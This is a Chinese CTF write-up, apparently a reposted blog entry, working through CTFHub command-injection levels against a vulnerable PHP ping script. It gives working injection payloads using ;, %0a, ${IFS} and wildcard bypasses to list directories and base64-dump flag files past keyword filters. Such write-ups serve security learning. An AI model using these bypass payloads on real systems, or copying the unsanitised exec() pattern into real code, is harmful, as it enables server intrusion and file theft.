标签:否则 payload pre 分隔符 综合 amp 命令执行 lin 一个
给了源码:
// 关键代码
<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {// 传入ip,
$cmd = "ping -c 4 {$_GET['ip']}";// 运行命令,可以拼接
exec($cmd, $res);// 执行cmd,把结果输出到res
}
if ($res) {
print_r($res);// 打印结果
}
show_source(__FILE__);
?>
根据第五行代码,这里直接拼接就行
看到有一个php文件,8061098418328.php
,直接用cat,但是没有显示
考虑到有特殊字符,无法回显,使用base64编码,拿到flag。
这里用到了管道符|
,表示把上一条命令的输出作为下一条命令的输入
过滤cat,类似cat的指令这里有一堆
和上一题思路一样,拼接语句
先用ls查看文件名
再用一个类似于cat的指令查看内容并以base64格式输出
下一题
空格用${IFS}
代替即可,还可以使用IFS$9、%09、<、>、<>、{,}、%20
来代替空格
其余思路和上一题一样
emmmm,我想的是,过滤了目录分隔符/
那我就不用了,
直接用;
拼接命令即可,其余思路一样
payload: 127.0.0.1;cd flag_is_here;catflag_159229063344.php | base64
前边只有base64编码的时候用到了运算符,而file | base64
也可以写成base64 file
剩下的思路以之前一致
过滤了|,&,;, ,/,cat,flag,ctfhub
空格可以用${IFS}
cat可以用more
flag可以用正则f***
ctfhub应该用不到
查了一下,在linux下,命令分隔符除了;
还有%0a
有了;就可以不用运算符了
然后按着之前的思路去做就可以了
最终的payload
!这里要注意,因为%0a是url编码,所以一定要输在url中,否则%0a会被再次编码
查看目录127.0.0.1%0als
查看文件夹内容127.0.0.1%0acd${IFS}f***_is_here%0als
查看flag127.0.0.1%0acd${IFS}f***_is_here%0abase64${IFS}f***_31393309531738.php
标签:否则 payload pre 分隔符 综合 amp 命令执行 lin 一个
原文地址:https://www.cnblogs.com/R3col/p/12515059.html